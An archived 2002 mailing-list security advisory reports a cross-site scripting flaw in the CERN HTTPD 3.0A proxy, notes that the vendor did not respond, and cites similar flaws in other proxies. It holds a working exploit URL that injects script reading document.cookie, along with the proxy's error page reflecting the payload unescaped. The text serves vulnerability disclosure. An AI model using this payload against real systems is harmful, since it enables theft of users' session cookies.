CERN Proxy Server: Cross-Site Scripting Vulnerability
From: TAKAGI, Hiromitsu (takagi.hiromitsuat_private)
Date: Sun Aug 11 2002 - 16:41:40 PDT
Next message: Joao Gouveia: "[Full-Disclosure] mantisbt security flaw"
CERN Proxy Server: Cross-Site Scripting Vulnerability
=====================================================
Affected:
CERN HTTPD 3.0A
http://www.w3.org/Daemon/Activity.html
Vendor Status:
CERN httpd team (httpdat_private) was notified on Aug 10, 2001 but
they did not respond.
Exploit:
http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT>
========================================================
<HTML>
<HEAD>
<TITLE>Error Message</TITLE>
</HEAD>
<BODY>
<H1>Fatal Error 500</H1>
Can't Access Document: http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT>.
<P>
<B>Reason:</B> Can't locate remote host: nonexistenthost.google.com.
<P>
...snip...
========================================================
Similar problems have been found in Proxomitron Naoko-4 BetaFour,
Microsoft ISA Server and Squid 2.4 DEVEL4.
<http://www.securityfocus.com/bid/3087>
<http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
<http://www.securityfocus.com/archive/1/197606>
Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/
This archive was generated by hypermail 2b30
: Mon Aug 12 2002 - 16:58:01 PDT